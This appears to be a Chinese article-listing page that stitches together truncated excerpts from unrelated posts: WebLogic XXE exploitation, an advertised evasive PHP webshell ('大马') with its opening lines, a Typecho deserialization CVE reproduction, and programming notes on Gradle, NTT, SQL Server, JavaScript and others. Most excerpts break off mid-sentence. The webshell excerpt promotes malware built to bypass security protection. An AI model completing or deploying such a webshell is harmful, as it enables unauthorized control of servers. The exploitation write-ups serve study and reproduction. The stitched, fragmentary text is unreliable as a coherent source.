weblogic之XXE利用与分析
本篇文章漏洞环境使用p神的CVE-2018-2628
本机IP：192.168.202.1
被攻击主机IP：192.168.202.129

1.1 简介
xxer能快速搭建起xxe的盲注环境，下载地址：https://github.com/TheTwitchy/xxer
工具使用python2启动，-h可查看帮助信息
C:\Users\asus\Desktop

weblogic之XXE利用与分析

因为之前使用的webshell大马很多都没用了，都被安全防护拦截了，所以通过几个大牛的指点和网上的教程整理而成自己做的增强版的webshell大马，我这个是源码，部分无加密！

<?php

$password = "68xi";//设置密码

error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");


【原创】改进的大马webshell，过市面上任何防护

0x00 漏洞简介
CVE-2018-18753
漏洞概述：
typecho 是一款非常简洁快速博客 CMS，前台 install.php 文件存在反序列化漏洞，通过构造的反序列化字符串注入可以执行任意 PHP 代码。
影响版本：typecho1.0（14.10.10）
0x01 环境搭建
上传源码到 WEB 目录，上传完毕后使用浏览器直接访问安装目录即可看到 Typecho 的 安装程序 ins

Typecho 反序列化漏洞 分析及复现

HMS Toolkit是一个IDE插件，提供包括应用创建、编码和转换、调测和测试、提交上架等多个端到端开发工具，借助HMS Toolkit可提升3倍以上集成开发效率，可以帮助开发者以更高的开发效率、更低的开发成本集成HMS Core各项服务，并打造出色的应用。

功能描述
Configuration Wizard为开发者提供一键式配置，自动化完成HMS Core所需的开发准备工作。在使用HMS T

HMS Toolkit自动化环境配置，助您高效集成HMS Core

（1）：float acos(float x) 参数x的范围为-1.0f到1.0f之间,返回值范围在0.0f到3.141592653f之间,值得注意的是:当x超出[-1.0f,1.0f]这个范围时此函数将返回一个-1.#IND000值,代表无穷小而编译器会不给出任何提示,通常此将会导致程序错误或崩溃,所以以后要注意数学函数的参数范围了.
可以通过以下代码进行调试:
float test = aco

-1.#IND000  &&图像类型转换

商业机构想知道：
访问者是如何找到我的网站
我网站是否包含有效内容
这是怎么影响我的底线的

搜索引擎优化报告

找到重要流量，优化搜索

跳出率报告

获取访问者对网站感兴趣地方，访问者来和去的网页

转换：
访问地点，持续时间，访问页数，事件

看报告

尝试改变网站增加转换率

Google analysis资源

新用户
是在选定日期范围内的首次访问用户数
会话数
是选定日期范围内的会话总

google analysis教程

请点赞，你的点赞对我意义重大，满足下我的虚荣心。
Hi，我是小彭。本文已收录到 GitHub · Android-NoteBook 中。这里有 Android 进阶成长知识体系，有志同道合的朋友，欢迎跟着我一起成长。（联系方式在 GitHub）

Gradle 作为官方主推的构建系统，目前已经深度应用于 Android 的多个技术体系中，例如组件化开发、产物构建、单元测试等。可见，要成为 Andr

为什么说 Gradle 是 Android 进阶绕不去的坎 —— Gradle 系列(1)

再探快速傅里叶变换(FFT)学习笔记(其二)(NTT)

目录
再探快速傅里叶变换(FFT)学习笔记(其二)(NTT)
写在前面
一些约定
前置知识
同余类和剩余系
欧拉定理
阶
原根
求原根
NTT
NTT的定义
从单位根到原根
常用NTT模数表
NTT的实现


为了不使篇幅过长，预计将把学习笔记分为四部分:
DFT,IDFT,FFT的定义,实现与证明:快速傅里叶变换(FFT)学习笔记(其一)

快速傅里叶变换(FFT)学习笔记(其二)(NTT)

SQLSERVER到底能识别多少个逻辑CPU?

SQLSERVER到底能识别多少个逻辑CPU?
前言
在前几天在论坛有人遇到SQLSERVER识别逻辑CPU的问题
帖子地址：
http://social.technet.microsoft.com/Forums/zh-CN/f8235ab2-4e46-4aea-81da-699d84b3b57b/sql-server-2005-
http://s

SQLSERVER到底能识别多少个逻辑CPU?

贪心算法。

#include <iostream>
#include <cstdio>
#include <cstring>
#include <queue>
#include <cmath>
#include <vector>
#include <algorithm>
using namespace std;
#define lowbit(x) (x&(-x))
#define max(x,y

UVA  Watering Grass

Javascript中大括号"{}"有四种语义作用：
语义1. 组织复合语句，这是最常见的：


view source
 
print?






1
if( condition ) {








2
  //...








3
}else {








4
  //...








5
}








6
for() {








7
  //...


